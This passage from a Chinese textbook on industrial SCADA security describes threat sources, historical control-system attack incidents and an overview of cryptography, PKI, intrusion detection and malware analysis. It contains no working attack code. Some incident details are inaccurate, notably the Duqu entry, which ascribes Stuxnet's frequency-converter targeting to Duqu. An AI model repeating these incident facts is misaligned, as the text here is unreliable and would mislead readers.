更多的网络攻击的风险。这些标准协议和技术具有很多众所周知的脆弱性,使得 工业控制系统更容易遭受那些高级的、有效的,并被广泛使用且简单易用的网络攻 击工具的攻击。 2)日益增加的外部网络连通性的风险 信息系统管理技术不断发展变化的结果是工业控制系统和传统 IT 信息系统 通常可以互连互通,远程访问的现实需求使得很多公司很愿意从外部建立和工业 控制系统的联系,使得工业控制系统工程师或技术支持人员可以从控制系统网络 外部监视和维护系统的运行。很多公司甚至将工业控制系统网络与公共网络连接 起来,目的是使得公司的决策者或管理者可以方便地访问正在运行的生产控制系统的重要参数,直接给设备制造商发送指令或管理产品的分配。在最初的时候,这 种方便性是通过用户应用程序软件或用于过程控制的对象链接与嵌入技术(OPC) 服务器或网关实现的。但是在最近几十年,这种连通性通过传输层控制协议、互联 网协议(TCP/IP) 网络以及标准的IP 应用层协议(如文件传输协议(FTP) 或可扩 展标记语言(XML)) 数据交换实现。通常情况下,这些远程连接在实现过程中并 没有充分考虑外部互联所带来的信息安全问题。除此以外,公司的网络还时常通 过互联网连接其战略合作伙伴,控制系统还经常使用WAN 和互联网给其远程或 本地站点及现场装置传输数据,这种控制系统网络与公共和合作伙伴网络的整合 以及互联互通能力,增加了控制系统遭受外部非法连接的脆弱性,除非设计足够安 全的信息安全机制,否则这种脆弱性有可能使工业控制系统所有层次的网络结构 都面临复杂网络错误、恶意攻击者和各种类型的蠕虫、病毒的威胁。 一项美国政府 对美国能源工业部门开展的非正式调查,正好显示了工业控制系统面临的新的 威胁。 (1)很多能源工业部门的管理者相信他们的控制系统并没有直接和公众网络 连接; (2)而通信管理部门的审计却显示大多数工业控制系统都不同程度地存在连 接公众网络的情形; (3)公众网络的信息安全措施只为普通的商业信息网络提供保护,但却不能 保护关键的能源工业系统。 3)不安全和恶意连接将带来的风险 很多工业控制系统设备供应商都在其设备中配备了电话拨号调制解调器,以 此提供远程访问能力,从而减轻对所有现场设备都派技术支持的人员压力。远程 访问机制为技术支持人员提供了针对设备的管理员权限级的访问能力,例如使用 电话号码以及访问控制证书(如有效的身份标识、密码等)。攻击者使用一种称为 “拨号器”(简单的、由人员操作的计算机程序通过持续不断地连接电话号码企图 搜寻到属于调制解调器的号码)的工具,以及密码破译软件来远程获取对工业控 制系统的非法连接访问能力。用来完成远程访问功能的密码通常是一个特定厂家 的一种型号的设备都是一样的,并且通常情况下终端用户不会更改这个密码。这 种类型的设备连接将会给整个系统留下非常巨大的威胁,因为攻击者利用设备自 带的调制解调器接入系统后通常拥有管理员权限,并可以完成只有管理员才能完 成的那些对工业控制系统的操作和访问。 能源工业系统用户通常有意无意地打开电话拨号调制解调器,以方便控制系 统工程师远程诊断、维护和进行系统监视。同样,控制系统中越来越多地使用无线 通信系统进行通信,无线通信系统的脆弱性更明显。未经过认证和加密保护的访 问连接机制,增加了恶意攻击者利用这种不安全连接对工业控制系统进行非法远 程访问的风险。当缺乏加密保护的数据在这种不安全的通信连接环境中传输,并且缺乏认证机制对访问进行控制时,根本无法对控制系统网络中传输信息的机密 性和完整性进行保护。这将导致恶意攻击者破坏所传输的控制系统信息数据的完 整性以及系统的可用性,进而将导致危及人生安全和设备安全。 很多公众网络和工业控制系统的互连互通性需要系统具有对不同通信标准的 兼容能力,这种兼容性的结果是在工程实现方面使得两种不同的系统网络之间可 以互相传输数据。因为兼容异构系统的复杂性问题,控制系统工程师常常不能正 确认识在工业控制系统中添加信息安全措施所带来的负荷问题。多数工业控制系 统工程师缺乏必要的信息安全技术方面的培训,并且在工业控制系统的信息安全 设计过程中一般不考虑传统 IT 网络中的常用技术手段。因此,保护工业控制系统 免遭来自公众网络的未授权、非法访问的访问控制技术手段通常只能发挥很有限 的作用。由于控制系统协议可能面临的、潜在的威胁行为并未得到充分认识,工业 控制系统中的脆弱性将长期存在,甚至可以躲避那些高级的信息安全解决措施。 如那些类似 TCP/IP 的协议通常具有不进行通信验证的特性,该特点将影响网络 层或应用层的信息安全机制发挥正常作用。 4)公开的信息可能带来的风险 公众可以非常方便地从互联网获取关于工业控制系统设计、维护、互联互通和 通信方面的资料,并在所选择的设备中尽可能使用开放性标准,这是工业控制系统 设备制造商为赢得商业竞争对手而采取的营销策略。工业控制系统设备制造商甚 至公开出售控制协议开发工具和套件,以帮助用户开发可以在工业控制系统环境 中使用的各种标准协议。遍布世界各地的前公司雇员、设备供应商、合作伙伴以及 其他相同型号的工业控制系统设备的终端用户具有关于某种典型的工业控制系统 设备操作和使用方面的内部信息。例如,美国和澳大利亚供水公司的前雇员利用 其掌握的关于供水SCADA 控制系统的内部信息造成供水控制系统失控,并倾泻 数亿加仑(1美加仑=3.785L) 水资源的重大事故,该事故是有记载的关于工业控 制系统信息安全的一起重大事件。 工业控制系统任何公开的信息和资源对潜在的恶意攻击者和出于各种目的的 入侵者来说都是有用的。在这些有价值的信息的帮助下,攻击者可以利用关于控 制系统非常关键的知识,并使用自动攻击工具和出厂设置中的缺省密码完成对控 制系统进行非授权访问,在大多数情况下,这些缺省密码是从不会改变的。 5)工业控制系统安全威胁分析 另一方面,工业控制系统的安全威胁是来自多方面的,如流氓政府、恐怖组织、 工业间谍、恶意入侵者等敌对势力的威慑;以及来自工业控制系统内部正常运行管 理过程中出现的威胁,如系统复杂性、操作人员失误和事故、设备故障和自然灾害 等。为防御敌对势力的威胁(以及工业控制系统运行中的日常问题),非常有必要 在工业控制系统中开发深度防御策略。表2.12列出了工业控制系统面临的主要 威胁。 表2.12 工业控制系统的主要威胁 威胁源 功 能 描 述 攻击者 攻击者入侵工业控制网络的目的,更多的是寻求刺激或者为了在黑客圈子中炫 耀。因为远程破解密码需要很高的技巧或计算机知识,攻击者可以方便地从互联 网下载攻击脚本和工业网协议,并通过互联网访问受攻击者的主页。网络攻击工 具功能越复杂越先进,对使用者来说将越方便。很多网络攻击者并不具备攻击类 似美国关键基础设施网络等复杂目标的专门技术,然而,世界范围内数量众多的 攻击者的攻击行为,使得可能引发工业控制系统网络中断和隔离,导致严重危害 的危险性不断增加 僵尸网络攻击者 僵尸网络攻击者入侵系统的目的并非炫耀或挑战,他们恶意接管很多系统的目 的是开展协同攻击,并传播垃圾邮件和恶意病毒。受到威胁或攻击的目标系统和 网络的敏感信息或服务将在地下市场非法交易(例如,预订一种拒绝服务攻击或 非法接管一台服务器用来传播病毒或恶意网络钓鱼) 犯罪集团 犯罪集团入侵工业控制系统的目的是获取金钱。特别是有组织的犯罪集团借 助垃圾邮件、网络钓鱼和间谋/恶意程序等窃取合法用户身份以及在线欺骗。国 际间谍和有组织犯罪集团通过其控制的工业间谍、金融诈骗者等,并以雇佣或发 展天才攻击者的方式对某一国工业控制系统形成威胁 国外情报部门 国外情报部门使用网络攻击工具作为开展信息收集和间谍行动的手段,此外, 许多国家正在发展具有挑衅意义的信息战规则、规划和能力。信息战能力使那些 独立国家通过中断或瘫痪支撑国防实力的能源、通信和经济基础供应,具有破坏 某一国公众的正常生产和生活的能力 内部人员 带有不满情绪的内部人员是计算机犯罪的重要因素,内部人员不需要大量计算 机知识,因为内部人员关于目标系统的技术细节知识,使得内部人员可以不受限 制的访问目标系统并实施破坏,或者直接窃取系统数据。内部威胁也包括外部销 售商,他们同雇员一样,会向系统中偶然引入恶意软件,内部人员可以是雇员、承 包商或商业合作伙伴。 不适当的配置、过程和测试项将对工业控制系统产生影响,这种影响涉及针对 工业控制系统和现场设备从细微到重要的影响。由于内部员工无意识引发的破 坏问题,是工业控制系统中的高概率事件 网络钓鱼者 网络钓鱼者是那些专注于执行钓鱼程序的个人或小团体,其根本目的是窃取与 经济利益相关的身份或敏感信息。网络钓鱼者也利用间谍/恶意程序达到其目的 垃圾邮件制造者 垃圾邮件制造者是那些分发隐藏虚假信息的恶意邮件的个人或团体组织,他们 的目的是销售产品、执行钓鱼程序,分发间谍/恶意程序或攻击一个公司目标(如 DOS攻击) (续) 威胁源 功 能 描 述 间谍/恶意程序开 发者 个人或团体组织出于恶意目的开发或传播间谍/恶意程序,以此报复用户。许 多分布式计算机病毒和蠕虫程序可以破坏文件系统甚至顺坏硬件,包括梅丽莎病 毒、浏览器Zip病毒、CIH(切尔诺贝利)病毒、尼姆达、红色代码、slammer、Blaster等 恐怖份子 恐怖分子企图破坏、中断或扰乱国家关键基础设施的正常运转,从而达到威胁 国家安全、制造大规模混乱、削弱美国经济、打击公众意志和民心士气的目的。恐 怖份子使用钓鱼程序或间谍/恶意程序窃取金钱或获取敏感信息。恐怖份子可以 袭击其中一个目标,将注意力或资源从其他目标系统转移 工业间谍 工业间谍是为了获取公司或组织的专用知识产权成果,并通过秘密方法获取其 具体研制方法 2.3 国内外工业 SCADA 系统网络典型攻击事件 一般认为传统 IT信息系统网络攻击是指:通过使用计算机网络来操纵一个定 向的隐蔽的活动来故意地中断、拒绝、降级或破坏被攻击者计算机、网络或驻留在 它们上的信息。 与传统的IT 信息系统安全需求不同,工业控制系统设计需要兼顾应用场景与 控制管理等多方面因素,以优先确保系统的高可用性和业务连续性。在这种设计 理念的影响下,缺乏有效的工业控制系统安全防御机制和数据通信保密措施是很 多工业控制系统所面临的通病。 据权威工业安全事件信息库(Repository of Security Incidents,RISI)统计,如 图2.1所示,截止2011年10月,全球已发生200余起针对工业控制系统的攻击事 件。2001 年后,通用开发标准与互联网技术的广泛使用,使得针对工业控制系统 的攻击行为出现大幅度增长,工业控制系统对于信息安全的需求变得更加迫切。 图2. 1 1982—2009年工业控制系统攻击事件统计 另一方面,随着工业控制系统广泛应用,安全问题日益增多,并存在向全行业 覆盖的趋势,国家经济越发达安全事件越多。详细数据如图2.2和图2.3所示。 污水处理 图2.2 按工业行业统计攻击事件 图2.3 按国家统计工控信息安全事件 其中,较为著名的、针对工业 SCADA 系统或与 SCADA 系统间接相关的攻击 事件如下: (1)黑客入侵“盐湖工程”事件——1994年,美国亚利桑那州凤凰城的主要供 水源以及电源发电系统——“盐湖工程”(SRP) 的控制网络遭到攻击。入侵者通 过一台“后门”计算机中的电话拨号调制解调器非法访问了“盐湖工程”控制网 络中的一台或多台计算机。 (2)黑客入侵伍斯特机场事件——1997年, 一个马萨诸塞州的 worcester 少年 黑客使用拨号调制解调器非法连接机场空中交通管理网的电信交换机系统,突然 中断机场空中管制塔、机场消防安全系统、机场天气预报系统和机场行李传送系统 的对外电话服务,并且机场空中交通管制塔用来管理跑道照明工程的主要无线电 发射装置和其他通信装置也被切断,因而瘫痪美国马萨诸塞州伍斯特机场的正常 运营长达6小时之久,该攻击事件还导致机场附近约600户人家的电话瘫痪。 (3)黑客控制天然气管道——2000 年,俄罗斯政府发表声明称,黑客控制了 其世界最大的天然气管道。 (4)黑客入侵污水处理工厂——2001年, 一个澳大利亚 SCADA 系统软件开 发小组的前雇员,46次非法入侵了SCADA 系统,控制了澳大利亚昆士兰州的污水 处理工厂,非法改变排污泵站的电力驱动装置参数,导致向邻近的河流和公园倾泻 了大约264000 加仑的原始污水。 (5)CSX 列车信号系统受攻击事件——2003年8月,整个美国东部沿岸的列 车运行控制信号系统突然关闭,美国媒体报道称该事件与一款名为“Sobig”的计算 机病毒有关。“Sobig” 病毒感染了美国佛罗里达州东北部港市杰克逊维尔 CSX 集 团的计算机系统,关闭了其信号系统、调度系统和其他系统。美国全国铁路委员会 报道称该事件导致当天早晨10列火车的正常出行受到影响,美国匹兹堡和佛罗伦 萨之间运行的火车,以及南加利福尼亚的火车由于信号系统失灵而彻底停止运行。 同时,还造成从美国加利福尼亚西部的里士满市出发,途经弗吉尼亚到华盛顿和纽 约的列车延误2小时,那些长距离的列车也被延误4~6小时之久。 (6)蠕虫入侵核电工程——2003年Slammer 蠕虫使美国俄亥俄州的一个核工 程控制网络崩溃, 一个来自互联网的后门程序连接到了公司的内部网络,而公司工 作人员没有监控到这一情况。 (7)美国东北部电网停电——2003年8月,美国第一电网公司的一套电网 SCADA 系统的告警处理系统突然失效,使得中央控制中心的操作人员没能在事故 发生的第一时间及时、快速地将整个电网切换至紧急情况处理状态。此外,电力 SCADA 系统失效还导致美国电网调度系统无法在事故发生期间准确地勘察整个 大电网的运行态势、电网潮流变化情况等,造成美国东北部电网很多重要的345kV 和138kV 输电线路发生故障,最终触发美国中西部,东北部和加拿大安大略电网 发生系列停电。受停电影响的人口约5000万人,地域约24000km², 停电持续时间 为29小时,损失负荷61800MWl⁹]。 (8)水库设备失灵——2005年,位于美国密执安那州Taum Sauk 水库大坝中 的现场测控装置读取的容量与远程监视工作站中读取的容量不一致,导致了灾难 性的后果,倾泻了10亿加仑的水资源。 (9)Zotob 蠕虫攻击——它利用Microsoft Windows Plug and Play 缓冲区溢出漏 洞传播,2005年8月,它感染了美国戴姆勒克莱斯勒的13个汽车制造工厂,使它们掉线几乎1小时。 (10)入侵者在水处理系统中种植了恶意软件 2006年,美国宾夕法尼亚 州首府哈里斯堡, 一个外国黑客通过互联网渗透了水过滤工厂的安全系统。入侵 者种植了恶意软件,能够影响工厂对水资源的正常处理操作。 (11)新闻报导的漏洞——2007年,美国有线新闻网(CNN) 报道了一个控制 系统的漏洞,这个漏洞可能会损坏发电机和电动机。 (12)入侵者破坏水管道的 SCADA 系统——2007年, 一个入侵者安装了非授 权的软件,摧毁了用于管理从美国萨克拉门托运河转运水的计算机。 (13)黑客攻击轨道交通控制系统——2008年,1月8日, 一名十几岁的少年 入侵波兰罗兹市的轨道交通控制系统,使4辆车辆出轨,他使用的是电视遥控器, 以便能够改变轨道。 (14)“震网”病毒攻击——2010年9月24日,伊朗核设施暴出Stuxnet 病毒攻击, 导致其核设施不能正常运行。该病毒是目前世界上首个网络“超级武器”,已经感染了 全球超过45000个网络,伊朗遭到的攻击最为严重,60%的PC 感染了这种病毒。 (15)黑客攻击供水 SCADA 系统——2011年,黑客通过入侵数据采集与监控 系统(SCADA), 使得美国伊利诺伊州首府普林菲尔德以西一处农村地区水利控制 系统,据称攻击位于俄罗斯。攻击者通过攻击一款远程监控水泵的软件系统,造成 一台水泵受损。美国国土安全部门和联邦调查局对此进行了调查,指出目前许多 控制重要行业的工业 SCADA 系统存在脆弱性,具有很大的安全隐患[10]。 (16)Duqu 病毒——Duqu病毒是专门针对工业控制系统开发的病毒,目标主要 是伊朗、英国和美国,控制中心位于印度。该病毒攻击目标是专门瞄准CPU 类型为 6ES7-417,6ES7-315-2 的至少33款变频器,工作频率为807~1210Hz。 (17)火焰病毒——火焰病毒(Flame,Flamer,sKyWIper,Skywiper)是于2012年5 月被发现的计算机病毒,以Lua语言与C++ 写成,利用微软公司视窗操作系统的一个 瑕疵,侵入计算机,被称为有史以来最复杂的恶意软件,在中东大范围传播。可能从 2010年就开始散播,这个恶意软件被怀疑是由美国国家安全局或以色列所研发的。 值得注意的是,以伊朗布什尔核电站遭到“震网”病毒攻击为代表的、 一系列 针对工业 SCADA 系统的信息安全事件表明:攻击者(有可能是国家行为)正尝试 采用被称为高级持续性威胁(Advanced Persistent Threat,APT)的新型攻击手段,大 规模破坏国家关键基础工业设施。这类攻击者不仅具有具体的攻击目标和明确的 政治军事意图,而且攻击过程具有多种攻击方式、多个攻击步骤协同的实施模式。 APT 攻击手段难以防御,对安全厂商及相关研究机构的安全服务能力提出了更高 的挑战。但由于国内工业控制系统及其工作环境的相对封闭性,国内信息安全研 究团队的研究对象多集中在互联网和传统的信息系统中,在工业控制系统信息安 全方面研究进展缓慢。另一方面原因是,工业控制系统提供商更关注工业控制系 统的可用性和实时性,对系统的信息安全性也很少涉及[12。 第3 章 工业SCADA 系统信息安全概述 3.1 工业 SCADA 系统信息安全内涵 通常情况下,工业 SCADA 系统安全可以分成三个方面,即功能安全、物理安 全和信息安全。 (1)功能安全是为了达到设备和工厂安全功能,受保护的、和控制设备的安全 相关部分必须正确执行其功能,而且当失效或故障发生时,设备或系统必须仍能保 持安全条件或进入到安全状态。 (2)物理安全是减少由于电击、火灾、辐射、机械危险、化学危险等因素造成的 危害。 ( 3 ) 在IEC62443 中针对工业控制系统信息安全的定义是:“保护系统所采取 的措施;由建立和维护受保护系统的措施所得到的系统状态;能够免于对系统资源 的非授权访问和非授权或意外的变更、破坏或者损失;基于计算机系统的能力,能 够保证非授权人员和系统既无法修改软件及其数据也无法访问系统功能,却保证 授权人员和系统不被阻止;防止对工业控制系统的非法或有害入侵,或者干扰其正 确和计划的操作。”工业SCADA 系统的信息安全不仅可能造成信息的丢失,还可 能造成工业过程生产故障的发生,从而造成人员损害及设备损坏,其直接财产的损 失是巨大的,甚至有可能引起环境问题和社会问题。 三种安全在定义和内涵上有很大的差别。 功能安全,使用安全完整性等级的概念已有近20年。功能安全规范要求通常 将一个部件或系统的安全表示为单个数字,而这个数字是为了保障人员健康、生产 安全和环境安全而提出的基于该部件或系统失效率的保护因子。 物理安全,保护要素主要由一系列安全生产操作规范定义。政府、企业及行业 组织等一般通过完备的安全生产操作流程约束工业系统现场操作的标准性,确保 事故的可追溯性,并可以明确有关人员的责任,管理和制度因素是保护物理安全的 主要方式。 工业控制系统信息安全的评估方法与功能安全的评估有所不同。虽然都是保 障人员健康、生产安全或环境安全,但是功能安全使用安全完整性等级是基于随机 硬件失效的一个部件或系统失效的可能性计算得出的,而信息安全系统有着更为 广阔的应用,以及更多可能的诱因和后果。影响信息安全的因数非常复杂,很难用 一个简单的数字描述出来。然而,功能安全的全生命周期安全理念同样适用于信 息安全,信息安全的管理和维护也必须是周而复始不断进行的。 通常情况下,工业 SCADA 系统的信息安全的内涵与外延模型如图3.1所示。 图3 . 1 工 业 SCADA 系统信息安全内涵与外延模型 按照工业部门生产、控制与管理的实际情况,工业 SCADA 系统信息安全的内 涵主要定位于工业现场控制装置/设备/网络的信息安全, 一般是自动控制系统的 信息安全;而其外延主要指工业 SCADA 系统的通信网络信息安全、控制中心数据 网络内网和外网信息安全,主要是传统 IP 数据网络的信息安全,也有部分信道(如 短波、超短波、GPRS等)信息安全的内容。工业 SCADA 系统信息安全内涵和外延 既相互区别又紧密联系,其关系如图3.2所示。 传统 IP 数据网络信息安全技术已经形成较为完备的体系。而工业现场控制 控制中心内部、 外部数据网络 信息安全 工业现场控制 装置/设备/网络 信息安全 图3.2 工业 SCADA 系统信息安全内涵与外延的关系 装置/设备/网络的信息安全技术相对处于起步阶段,具有许多与传统 IP 数据网络 信息安全不同的新概念、新技术和新服务,本书所讨论的工业SCADA 系统信息安 全主要指与工业现场控制装置/设备/网络相关的理论、技术和概念。 3.2 传统 IP 数据网络信息安全机制 3.2.1 信息保护技术 IT信息网络的信息保护技术归根结底是密码技术。现代密码技术将密码理 论与技术分成两大类, 一类是基于shannon 信息论和数学运算的密码理论;另一类 是基于非数学的密码理论与技术,包括信息隐藏、量子密码、基于生物特征的识别 理论与技术等。基于信息论和数学运算的密码理论主要有以下两个分类: 1)对称密码技术 对称密码技术又称单密钥或常规密码。 一般指 Ek =Dk 的密码系统,即同一 个密钥既用于加密也用于解密的技术。对称加密算法是应用较早的加密算法,技 术成熟。其基本原理是:数据发信方将明文(原始数据)和加密密钥一起经过特殊 加密算法处理后,使其变成复杂的加密密文发送出去。收信方收到密文后,需要使 用加密用过的密钥及相同算法的逆算法对密文进行解密,才能使其恢复成可读明 文。在对称加密算法中,使用的密钥只有一个,发收信双方都使用这个密钥对数 据进行加密和解密,这就要求解密方事先必须知道加密密钥。对称密码体制根据 实现不同又分为分组密码和流密码。 2)非对称密码技术 对称密码技术在实际应用中有两大难题: 一是密钥分配(密钥管理困难);二 是数字签名。1976年Diffie 和 Hellman 发表了非对称密码的奠基性的论文“密码学的新方向”,建立了公钥密码的概念。公钥密码的基本思想:将密钥 K一分为 二, 一个专门加密, 一个专门解密:PKB≠SKB; 由 PKB 不能计算出SKB, 因此可将 Ke 公开,使密钥分配简单;由于PKB≠SKB, 且 由PKB不能计算出 SKB,因此可将 SKB 作为用户指纹,以方便实现数字签名。通常,关于非对称密码体制的分类,是 根据其所基于的数学基础的不同,主要分为如下几类。 (1)基于大整数分解难题的,包括 RSA 密码体制,Rabin 密码等。 (2)基于离散对数难题的,如 ElGamal 密码,有限域上的离散对数问题的难度 和大整数因子分解问题的难度相当。 (3)基于椭圆曲线离散对数的密码体制。严格说来,它可归于基于离散对数 难题的密码体制中。不过由于有限域上的椭圆曲线有它的一些特殊性,人们往往 把它单独归为一个类别。 (4)基于在网格中寻找最短向量的数学难题的密码体制。如颇受关注的NT- RU。除了上述的公钥密码体制外,人们研究的还有基于背包问题的 MH 背包体 制,基于代数编码理论的MeEliece 体制,基于有限自动机理论的公钥密码体制,基 于双线性配对技术的基于身份的公钥密码体制等。 基于非数学的密码理论与技术:信息隐藏、量子密码、基于生物特征的识别理 论与技术等。 3.2.2 身份认证技术 在网络环境中,身份认证是鉴别资源的访问者的合法性的基础手段。采用用 户名—口令的方式进行身份认证是目前实现计算机安全的主要手段之一,但是采 用用户名—口令的方式,在越来越复杂的网络环境中却相对脆弱。首先由于应用 系统设计上的缺陷,用户口令可能在网络中以明文传输,另外在口令的存储中甚至 也可能是明文的或是经过简单加密措施处理的。这些隐患都可能为恶意的攻击提 供可能。 公钥基础设施(Public Key Infrastructure,PKI)是采用非对称密码算法和技术 来实现并提供安全服务,并具有通用性的安全基础设施,是一种遵循标准的密钥 管理平台。它能够为所有网络应用透明地提供采用加密和数字签名等密码服务 所必需的密钥和证书管理。PKI 体系实际上就是计算机软硬件、权威机构及应 用系统的结合。它采用数字证书的形式管理公钥,通过CA 把用户的公钥和用 户的其他标识信息(如名称、身份证号码、E-mail 地址等)捆绑在一起,实现对用 户身份的验证。它将公钥密码和对称密码结合起来,通过网络和计算机技术实现 密钥的自动管理,保证机密数据的保密性和完整性,其目标就是要充分利用公钥密 码学的理论基础,建立起一种普遍适用的基础设施,为各种网络应用提供全面的安 全服务。 3.2.3 通信网络安全技术 目前通信网络常用的基础性信息安全技术包括以下技术。 (1)身份认证技术。用来确定用户或者设备身份的合法性,典型的手段有用 户名口令、身份识别、身份证书和生物认证等。 (2)加解密技术。在传输过程或存储过程中进行信息数据的加解密,典型的 加密体制可采用对称加密和非对称加密。 (3)边界防护技术。防止外部网络用户以非法手段进入内部网络,访问内部 资源,保护内部网络操作环境的特殊网络互连设备,典型的设备有防火墙和入侵检 测设备。 (4)访问控制技术。保证网络资源不被非法使用和访问。访问控制是网络安 全防范和保护的主要核心策略,规定了主体对客体访问的限制,并在身份识别的基 础上,根据身份对提出资源访问的请求加以权限控制。 (5)主机加固技术。操作系统或者数据库的实现会不可避免地出现某些漏 洞,从而使信息网络系统遭受严重的威胁。主机加固技术对操作系统、数据库等进 行漏洞加固和保护,提高系统的抗攻击能力。 (6)安全审计技术。包含日志审计和行为审计,通过日志审计协助管理员在 受到攻击后查看网络日志,从而评估网络配置的合理性、安全策略的有效性,追溯 分析安全攻击轨迹,并能为实时防御提供手段。通过对员工或用户的网络行为审 计,确认行为的合理性,确保管理的安全。 (7)检测监控技术。对信息网络中的流量或应用内容进行多层次的检测并适 度监管和控制,避免网络流量的滥用、垃圾信息和有害信息的传播。 3.2.4 密钥管理技术 密钥管理可以为系统提供机密性、完整性、实体认证、数据源认证和数字签名。 密钥管理是指一组技术和过程,能够在授权的条件下为可信系统提供密钥关系的 建立和维护。主要包含以下技术和过程: (1)系统用户的初始化; (2)密钥材料的生成、分发和安装; (3)控制密钥材料的使用; (4)密钥材料的更新、撤销和销毁; (5)密钥材料的存储、备份、恢复和存档。 大体来说,密钥管理技术分为:密钥建立、密钥分发两个过程。 密钥建立:在有N 个用户的系统中,如果使用对称技术确保每一对用户安全 地进行通信,就需要每对用户之间共享一个特定的密钥。如果按照这种情况,则整 个系统需要的密钥个数为N(N-1)/2 个。若系统用户不断增加,会对系统的存储空间和速度造成一定的影响。采用密钥建立的方法,使用中心化的密钥服务器,可 以建立一个星型或者轮型网络,在通信的中心节点建立一个可信的第三方。这样 可以降低大数量密钥分发问题,而代价是需要提供在线的可信第三方。 密钥分发:密钥分发又分为对称密钥证书和公钥分发两种方式。 密钥转换中心(KTC) 是一个可信服务器,允许两个不直接共享密钥材料的参 与方A 和 B 建立安全的通信。 3.2.5 网络监控与防护 防火墙是在信道上将通信双方隔离的安全堡垒,在一些特殊的情况下,防火墙 虽然能根据规则过滤数据包,但是在需要实时监控的网络情况下会存在延迟,这也 会导致各种网络问题。正因为如此,在过去十年间的防火墙构架设计中,已经与入 侵检测系统(IDS) 混为一体。IDS 技术以被动防御作为主要特征,以后台静默运行 的方式分析特定 PC 接收到的异常网络行为,并不会过多的影响控制环境。 按照传统的方法,IDS技术可以按照信息源分析基础分为以下两类: (1)网络入侵检测系统:以搜集攻击证据为目标的网络流量分析引擎; (2)主机入侵检测系统:安装在目标服务器上,分析恶意软件异常行为。 按照鉴定威胁的方法,IDS也可以分为以下两类: (1)基于威胁的签名:对搜集到的攻击特征进行签名,IDS对签名特征进行匹 配比较; (2)基于异常行为:提前对网络异常行为进行特征提取,IDS 对异常行为进行 匹配比较。 3.2.6 网络行为分析与防护 网络恶意行为通常意义上是指通过各种软件或者直接入侵等手段破坏主机系 统、非法窃取或损坏用户数据、对目标主机或者网络造成各种不良影响的行为,其 特征表现为行为的恶意性,即这类行为的目标和结果对用户而言都是不期望或不 应该的,如攻击行为、入侵行为等。 恶意网络行为主要具有如下特点: (1)非法性。这是恶意网络行为最基本的特性。不管是从行为的目的还是行 为所执行的方法和手段对用户而言都是不合法的。恶意网络行为的目的是破坏目 标计算机的软硬件资源或者获取目标计算机中存储的各种秘密数据和文件,而恶 意网络行为所采取的手段主要是利用各种恶意软件来实现其攻击或者入侵的目 的,这些都是独立于用户所执行网络应用和服务之外的,具有一定的危害性。 (2)多样性。主要是恶意网络行为的目的和实现技术多种多样。恶意网络行 为的目的有破坏系统、获取信息、商业利益等,还存在单纯的是为了个人兴趣爱好 而实施各种网络攻击行为。而不同的目的,所实现的手段和方法也多种多样,如病毒传播、木马植入、流氓软件、电子邮件欺骗、各种扫描技术等。多样性是当今恶意 网络行为难以完全遏制的重要原因。 (3)隐蔽性。随着对网络安全问题研究的不断深入,网络攻击防范技术的逐 渐成熟,各种攻击、入侵等恶意网络行为要实现其非法目的面临着越来越多的挑 战,于是,各种隐蔽技术和方法成为了攻击者实现其攻击行为的重要前提。当前大 部分的恶意网络行为都是在目标主机用户及其相关安全防护软件不能有效察觉和 发现的前提下执行的,从而保证了攻击目的有效实现。隐蔽性在各种特洛伊木马 程序中体现得尤为突出。 (4)随机性。由于网络环境的复杂性和多样性,各种各样不同身份的人员都 处于Internet 这个大环境下,任何人都有可能成为网络恶意行为的发起者。研究 分析发现,网络恶意行为的实施者主要有黑客(Hacker) 、破坏者(Cracker)、技术爱 好者以及以政治或者商业利益为目的的间谍等。正是由于这类人员的大量存在, 使得网络恶意行为无时无刻不在发生着,对于处于Internet 的主机而言,其所面临 的网络恶意行为就具有很强的未知性和随机性,从而加深了恶意网络行为检测和 网络安全防护技术有效实现的难度。 网络行为分析有以下几种方式: (1)流量分析。基于网络流量的主机安全防护技术,主要是通过常规行为的 过滤再经过恶意行为的匹配,从而识别产生各种流量的行为是否异常。经过第一 步常规行为的过滤,剩下的就是可疑的或者是需要进一步确定的行为。第二步恶 意行为的匹配就是恶意行为的检测技术所要实现的内容。流量分析的恶意行为检 测方法就是通过对数据包的各种特征与收集到的各种恶意行为的流量特征进行匹 配,根据匹配的异同程度识别恶意行为。 (2)文件监控。文件监控就是指对用户的特定文件进行监控, 一旦发现有应 用程序对其进行使用或者对外进行传输就特别关注该应用程序,判断该程序是否 是用户自己,该数据传输是否是用户主动向外发送的。文件监控的实现就是在系 统运行之初由用户自己设定其私密数据,设置触发器, 一旦发现有应用程序对该数 据进行引用或者操作就触发一个线程对该应用程序进行分析和检测,根据用户当 前执行的操作就可以判断是否是用户主动发出还是恶意的文件窃取行为。文件监 控的目的就是实现主机私密数据保护。 (3)进程分析。由上述可知,流量分析的性能取决于恶意行为流量特征的收 集,但任何一种知识库都不可能包含全部的恶意行为的所有流量特征,尤其对于文 件盗取型恶意软件的流量特性与现在的很多如媒体播放、P2P 共享传输等网络应 用的流量特性存在很大程度的相似,在这种情况下,进程分析的方法就能够发挥很 重要的作用。所谓进程分析就是通过对各个未能够判断和检测的流量行为的主体 即应用程序进程进行深入分析来检测和识别异常或者恶意行为。大部分的恶意行 为在网络流量、进程行为等方面都有所体现,在流量分析无法实现异常检测的情况下,进程分析是一种有效的方法。进程分析首先要构建系统常规程序和所有的服 务程序以及各种常用应用程序进程名的数据库,以此过滤掉最简单的通过修改程 序名来实现隐藏的恶意程序;再构建系统服务进程的网络特性,结合进程类型判断 来识别冒充系统不常用服务进程的恶意程序;对于绑定系统服务进程的、利用添加 或者改变系统服务DLL文件等手段实现隐藏的恶意程序,DLL文件分析能够有效 发挥作用,主要是通过将绑定有恶意软件的系统服务 DLL文件与正常情况下的系 统服务 DLL文件进行对比分析,以此来判断系统服务进程是否成为恶意程序的载 体。如对于系统服务进程 smss.exe 是不会对外发送数据流量且所使用的是单一 的 ntdll.dI 文件,如果某时刻用户主机中发出流量的进程为 smss.exe 又或者该进 程对应的 DLL文件不是或者不仅仅是 ntdll.dⅡ 文件,则可以判断该进程存在恶意 或者异常代码,是恶意或者异常程序。 3.2.7 恶意代码分析与防护 在条件允许的情况下,计算机都需要安装病毒检测软件。反病毒软件都需要 正确的配置和升级。并且,各类便携存储介质,包括U 盘、掌上电脑等设备都需要 安装特定的安全产品,因为它们都是恶意软件的重要感染目标。 恶意代码的分析方法可以分为静态分析和动态分析两大类。分析的主要目的 是明确恶意代码的行为特性并提取特征码为下一步的恶意代码检测和控制清除提 供依据,因此恶意代码分析是否可以快速有效地进行,是降低恶意代码危害的关键 环节。但是如今的恶意代码为了躲避杀毒软件和安全工具的检测与查杀,广泛采 用各种隐藏技术来隐藏自身,并不是想象中的那么随处可得。 